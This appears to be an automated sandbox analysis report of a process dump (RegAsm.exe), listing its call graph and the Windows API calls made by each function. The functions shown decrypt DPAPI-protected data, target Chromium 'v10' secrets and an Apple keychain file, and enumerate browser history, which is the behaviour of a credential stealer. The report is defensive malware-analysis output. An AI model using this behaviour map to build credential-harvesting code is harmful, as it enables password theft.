409b98 GetFileAttributesW 39048->39056 39049->39048 39051 40e68f 39052 40c2d8 39051->39052 39057 40e4b2 39051->39057 39052->38978 39052->38979 39054->39039 39055->39047 39056->39051 39078 40e01e 39057->39078 39059 40e593 39060 40e5b0 39059->39060 39061 40e59c DeleteFileW 39059->39061 39062 40b04b ??3@YAXPAX 39060->39062 39061->39060 39064 40e5bb 39062->39064 39063 40e521 39063->39059 39101 40e175 39063->39101 39066 40e5c4 CloseHandle 39064->39066 39067 40e5cc 39064->39067 39066->39067 39069 40b633 free 39067->39069 39068 40e573 39070 40e584 39068->39070 39071 40e57c CloseHandle 39068->39071 
39072 40e5db 39069->39072 39122 40b1ab free free 39070->39122 39071->39070 39075 40b633 free 39072->39075 39074 40e540 39074->39068 39121 40e2ab 30 API calls 39074->39121 39076 40e5e3 39075->39076 39076->39052 39079 406214 22 API calls 39078->39079 39080 40e03c 39079->39080 39081 40e16b 39080->39081 39082 40dd85 60 API calls 39080->39082 39081->39063 39083 40e06b 39082->39083 39083->39081 39084 40afcf ??2@YAPAXI ??3@YAXPAX 39083->39084 39085 40e08d OpenProcess 39084->39085 39086 40e152 39085->39086 39087 40e0a4 GetCurrentProcess DuplicateHandle 39085->39087 39090 406214 22 API calls 39086->39090 39094 40e160 39086->39094 39088 40e0d0 GetFileSize 39087->39088 39089 40e14a CloseHandle 39087->39089 39092 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39088->39092 39089->39086 39090->39094 39091 40b04b ??3@YAXPAX 39091->39081 39093 40e0ea 39092->39093 39095 4096dc CreateFileW 39093->39095 39094->39091 39096 40e0f1 CreateFileMappingW 39095->39096 39097 40e140 CloseHandle CloseHandle 39096->39097 39098 40e10b MapViewOfFile 39096->39098 39097->39089 39099 40e13b CloseHandle 39098->39099 39100 40e11f WriteFile UnmapViewOfFile 39098->39100 39099->39097 39100->39099 39102 40e18c 39101->39102 39103 406b90 11 API calls 39102->39103 39104 40e19f 39103->39104 39105 40e1a7 memset 39104->39105 39106 40e299 39104->39106 39111 40e1e8 39105->39111 39107 4069a3 ??3@YAXPAX free 39106->39107 39108 40e2a4 39107->39108 39108->39074 39109 406e8f 13 API calls 39109->39111 39110 406b53 SetFilePointerEx ReadFile 39110->39111 39111->39109 39111->39110 39112 40e283 39111->39112 39113 40dd50 _wcsicmp 39111->39113 39117 40742e 8 API calls 39111->39117 39118 40aae3 wcslen wcslen _memicmp 39111->39118 39119 40e244 _snwprintf 39111->39119 39114 40e291 39112->39114 39115 40e288 free 39112->39115 39113->39111 39116 40aa04 free 39114->39116 39115->39114 39116->39106 39117->39111 39118->39111 39120 40a8d0 7 API calls 39119->39120 39120->39111 39121->39074 39122->39059 39127 40a980 
[Call-graph adjacency data not reproduced: the report's graph export lists node ids, function addresses and edge pairs (e.g. "39123->39127") with the Win32/CRT calls reached at each node, among them CryptUnprotectData, RegEnumValueW, GetPrivateProfileStringW, WritePrivateProfileStringW, FindResourceW, LoadResource, EnumResourceNamesW, K32GetModuleFileNameExW, GetProcessTimes and FreeLibrary. The rendered graph is only meaningful in the interactive report.]

                                                                                                                                                                                                  Control-flow Graph

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 2018390131-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 1945712969-0
• Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
• Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                  Control-flow Graph

APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 2334598624-3798722523
• Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Control-flow Graph

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNEL32(00008001), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 1442760552-28296030
• Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
• Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CloseHandle.KERNEL32(00000000), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT ref: 0040B9BF
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 229402216-2783969131
• Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
• Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
• Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
• Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
• CloseHandle.KERNEL32(?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 3957639419-1740548384

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNEL32(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
• __set_app_type.MSVCRT ref: 00446762
• __p__fmode.MSVCRT ref: 00446777
• __p__commode.MSVCRT ref: 00446785
• __setusermatherr.MSVCRT ref: 004467B1
• _initterm.MSVCRT ref: 004467C7
• GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
• _initterm.MSVCRT ref: 004467FD
• GetStartupInfoW.KERNEL32(?), ref: 0044685A
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
• exit.MSVCRT ref: 00446897
• _cexit.MSVCRT ref: 0044689D
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID:
• API String ID: 2791496988-0

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 2470578098-1702587658

Control-flow Graph

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                                                                                  • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                  Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Control-flow Graph

APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
